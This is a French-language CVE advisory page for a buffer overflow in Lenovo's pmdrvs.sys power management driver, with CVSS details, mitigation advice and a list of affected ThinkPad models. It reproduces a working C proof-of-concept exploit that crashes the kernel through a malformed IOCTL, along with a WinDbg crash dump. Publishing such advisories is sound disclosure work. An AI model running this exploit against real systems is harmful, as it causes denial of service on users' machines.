CVE-2019-6192 : Détail

CVE-2019-6192

4.4
/
Moyen
Overflow
1.48%V4
Local
2019-12-10
18h05 +00:00
2024-09-17
04h20 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

A potential vulnerability has been reported in Lenovo Power Management Driver versions prior to 1.67.17.48 leading to a buffer overflow which could cause a denial of service.

Solutions du CVE

Update to Lenovo Power Management driver version 1.67.17.48 or higher.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V3.1 4.4 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

The vulnerable component is not bound to the network stack and the attacker’s path is via read/write/execute capabilities.

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

High

The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable component allowing access to component-wide settings and files.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

None

There is no loss of confidentiality within the impacted component.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
V2 2.1 AV:L/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 47771

Date de publication : 2019-12-11 23h00 +00:00
Auteur : Nassim Asrir
EDB Vérifié : No

# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC) # Date: 2019-12-11 # Exploit Author: Nassim Asrir # CVE: CVE-2019-6192 # Tested On: Windows 10(64bit) | ThinkPad T470p # Vendor : https://www.lenovo.com/us/en/ # Ref : https://support.lenovo.com/us/fr/solutions/len-29334 # Description # A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver # The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes # Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space. # Exploit #include <windows.h> #include <stdio.h> #include <conio.h> int main(int argc, char **argv) { HANDLE hDevice; DWORD bret; char szDevice[] = "\\\\.\\pmdrvs"; printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n"); printf("Opening handle to driver..\n"); if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) { printf("Device %s succesfully opened!\n", szDevice); printf("\tHandle: %p\n", hDevice); } else { printf("Error: Error opening device %s\n", szDevice); } printf("\nPress any key to DoS.."); _getch(); bret = 0; if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL)) { printf("DeviceIoControl Error - bytes returned %#x\n", bret); } CloseHandle(hDevice); return 0; } # RCA 2: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. FAULTING_IP: pmdrvs+109d fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50) rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246 pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? Resetting default scope CPU_COUNT: 8 CPU_MHZ: af8 CPU_VENDOR: GenuineIntel CPU_FAMILY: 6 CPU_MODEL: 9e CPU_STEPPING: 9 CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init) BLACKBOXBSD: 1 (!blackboxbsd) BLACKBOXPNP: 1 (!blackboxpnp) CURRENT_IRQL: 0 ANALYSIS_SESSION_HOST: LAPTOP-SP ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485 ANALYSIS_VERSION: 10.0.17763.132 amd64fre LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d STACK_TEXT: ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060 ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59 ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071 ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56 ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925 00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844 THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b FOLLOWUP_IP: pmdrvs+109d fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] FAULT_INSTR_CODE: 8941078b SYMBOL_STACK_INDEX: 0 FOLLOWUP_NAME: MachineOwner STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb BUGCHECK_STR: 2E8B5A19 EXCEPTION_CODE_STR: 2E8B5A19 EXCEPTION_STR: WRONG_SYMBOLS PROCESS_NAME: ntoskrnl.wrong.symbols.exe IMAGE_NAME: ntoskrnl.wrong.symbols.exe MODULE_NAME: nt_wrong_symbols SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000 BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000 TARGET_TIME: 2019-09-30T19:27:36.000Z OSBUILD: 17763 OSSERVICEPACK: 0 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 SUITE_MASK: 272 PRODUCT_TYPE: 1 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS OS_LOCALE: USER_LCID: 0 OSBUILD_TIMESTAMP: 1994-09-30 01:21:45 BUILDDATESTAMP_STR: 180914-1434 BUILDLAB_STR: rs5_release BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434 ANALYSIS_SESSION_ELAPSED_TIME: ae ANALYSIS_SOURCE: KM FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000 FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1} Followup: MachineOwner --------- 2: kd> u fffff804`28bf109d pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000) fffff804`28bf10a8 85c0 test eax,eax fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132) fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h] fffff804`28bf10b8 4885c9 test rcx,rcx fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132) 2: kd> !for_each_frame .frame /r @$Frame _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!KeBugCheckEx: fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7f09: fffff804`1f27a8e9 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c 02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x735c: fffff804`1f279d3c b801000000 mov eax,1 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f 03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!_chkstk+0x41f: fffff804`1f271b4f 0f1f00 nop dword ptr [rax] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!RtlUnwindEx+0x3440: fffff804`1f1ca460 8bd0 mov edx,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000 rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40 r14=ffffc709dee8f4b0 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!ExReleaseAutoExpandPushLockExclusive+0x264: fffff804`1f0d7c24 84c0 test al,al _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7fe2: fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce 07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x42ce: fffff804`1f276cae 440f20c0 mov rax,cr8 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d 08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000 rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 pmdrvs+0x5060: fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!IofCallDriver+0x59: fffff804`1f12dba9 4883c438 add rsp,38h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtQueryInformationFile+0x1071: fffff804`1f6abb11 448bf0 mov r14d,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc 0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0 rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtClose+0xffc: fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtDeviceIoControlFile+0x56: fffff804`1f64c356 4883c468 add rsp,68h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7925: fffff804`1f27a305 0f1f00 nop dword ptr [rax] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 00007fff`33aaf844 ?? ??? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx # Mitigation Update to Lenovo Power Management driver version 1.67.17.48 or higher

Products Mentioned

Configuraton 0

Lenovo>>Power_management_driver >> Version To (excluding) 1.67.17.48

Lenovo>>Thinkpad_13_gen_2 >> Version -

Lenovo>>Thinkpad_25 >> Version -

Lenovo>>Thinkpad_a275 >> Version -

Lenovo>>Thinkpad_a285 >> Version -

Lenovo>>Thinkpad_a475 >> Version -

Lenovo>>Thinkpad_a485 >> Version -

Lenovo>>Thinkpad_e14 >> Version -

Lenovo>>Thinkpad_e15 >> Version -

Lenovo>>Thinkpad_e470 >> Version -

Lenovo>>Thinkpad_e470c >> Version -

Lenovo>>Thinkpad_e475 >> Version -

Lenovo>>Thinkpad_e480 >> Version -

Lenovo>>Thinkpad_e490 >> Version -

Lenovo>>Thinkpad_e495 >> Version -

Lenovo>>Thinkpad_e570 >> Version -

Lenovo>>Thinkpad_e570c >> Version -

Lenovo>>Thinkpad_e575 >> Version -

Lenovo>>Thinkpad_e580 >> Version -

Lenovo>>Thinkpad_e590 >> Version -

Lenovo>>Thinkpad_e595 >> Version -

Lenovo>>Thinkpad_l13 >> Version -

Lenovo>>Thinkpad_l13_yoga >> Version -

Lenovo>>Thinkpad_l380 >> Version -

Lenovo>>Thinkpad_l380_yoga >> Version -

Lenovo>>Thinkpad_l390 >> Version -

Lenovo>>Thinkpad_l390_yoga >> Version -

Lenovo>>Thinkpad_l470 >> Version -

Lenovo>>Thinkpad_l480 >> Version -

Lenovo>>Thinkpad_l490 >> Version -

Lenovo>>Thinkpad_l570 >> Version -

Lenovo>>Thinkpad_l580 >> Version -

Lenovo>>Thinkpad_l590 >> Version -

Lenovo>>Thinkpad_p1 >> Version -

Lenovo>>Thinkpad_p1_gen_2 >> Version -

Lenovo>>Thinkpad_p43s >> Version -

Lenovo>>Thinkpad_p51 >> Version -

Lenovo>>Thinkpad_p51s >> Version -

Lenovo>>Thinkpad_p52 >> Version -

Lenovo>>Thinkpad_p52s >> Version -

Lenovo>>Thinkpad_p53 >> Version -

Lenovo>>Thinkpad_p53s >> Version -

Lenovo>>Thinkpad_p7 >> Version -

Lenovo>>Thinkpad_p72 >> Version -

Lenovo>>Thinkpad_p73 >> Version -

Lenovo>>Thinkpad_r14 >> Version -

Lenovo>>Thinkpad_r480 >> Version -

Lenovo>>Thinkpad_s1_gen_4 >> Version -

Lenovo>>Thinkpad_s2_gen_2 >> Version -

Lenovo>>Thinkpad_s2_gen_5 >> Version -

Lenovo>>Thinkpad_s2_yoga_gen_5 >> Version -

Lenovo>>Thinkpad_s3_gen_2 >> Version -

Lenovo>>Thinkpad_s5_gen_2 >> Version -

Lenovo>>Thinkpad_t470 >> Version -

Lenovo>>Thinkpad_t470p >> Version -

Lenovo>>Thinkpad_t470s >> Version -

Lenovo>>Thinkpad_t480 >> Version -

Lenovo>>Thinkpad_t480s >> Version -

Lenovo>>Thinkpad_t490 >> Version -

Lenovo>>Thinkpad_t490s >> Version -

Lenovo>>Thinkpad_t495 >> Version -

Lenovo>>Thinkpad_t570 >> Version -

Lenovo>>Thinkpad_t580 >> Version -

Lenovo>>Thinkpad_t590 >> Version -

Lenovo>>Thinkpad_x1_carbon_gen_5 >> Version -

